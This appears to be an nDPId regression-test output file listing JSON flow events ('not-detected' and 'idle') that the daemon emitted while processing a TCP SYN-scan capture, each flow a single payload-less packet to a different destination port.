+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 